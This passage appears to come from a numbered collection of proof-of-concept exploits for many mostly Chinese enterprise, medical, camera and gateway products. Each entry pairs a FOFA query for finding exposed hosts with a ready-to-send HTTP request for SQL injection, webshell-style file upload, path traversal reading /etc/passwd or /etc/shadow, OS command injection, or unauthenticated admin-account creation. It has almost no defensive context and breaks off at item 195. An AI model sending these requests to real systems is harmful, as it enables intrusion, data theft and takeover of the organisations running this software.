POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
· TBK DVR-4104
· TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. Meite (美特) CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT (英飞达) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop (科拓) fully intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload a file. The <fileName> field specifies the file name and the <fileFlow> field the file contents, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Hui Campus (Anxiaoyi, 慧校园/安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. Lean Value Management System (LVS, 精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing (宏景, HJSOFT) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing (宏景) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. Jinhe (金和) OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinhe (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. Jianwen (建文) engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke (帮管客) CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. Runshen (润申) enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (广州图创) Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. Xunrao (迅饶, SunFull) X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. Realor (瑞友) Tianyi application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation installations.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. Santi Jiahui (叁体-佳会) video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The stacked WAITFOR DELAY statement only works against a SQL Server (T-SQL) backend; a response delayed by about 5 seconds confirms the injection.


190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

The poi parameter is handed to a URL fetcher, so the file:// scheme turns the fetch into a local file read.


191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

The /js/../ prefix is a common filter-bypass trick: static-resource paths are usually exempt from the login filter, and the servlet container normalises the path to /CDGServer3/NavigationAjax only after the filter has matched it.


192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

The extension of the stored file comes from the name query parameter and the raw request body becomes its content, which is why the body is an .ashx handler rather than a form field; requesting the stored handler should return "test".


193. 山石网科云鉴安全管理系统 setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
1. Obtain a CSRF token bound to a PHPSESSID of your choosing:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

2. Send the command with that token and the same PHPSESSID. The payload writes a marker into a path under the web root so the result can be read back:
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

3. Read the file back; 23333333333456 in the response confirms execution:
GET /master/img/config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0


194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

The filename is used unsanitised, so the ../ prefix walks out of the attachment directory and drops hello.jsp into the deployed fe.war, where the container will execute it.


195. 飞鱼星上网行为管理系统 send_order.cgi command execution
